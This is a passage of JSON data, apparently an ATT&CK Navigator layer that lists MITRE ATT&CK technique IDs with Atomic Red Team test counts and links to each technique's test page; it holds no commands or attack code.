Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":51,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":22,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":67,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":6,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":33,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":34,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.001","score":3,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":29,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1115","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}]},{"techniqueID":"T1127.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":10,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1137","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.001/T1137.001.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216.001","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":78,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222.002","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1485","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"links":[{"label":"View 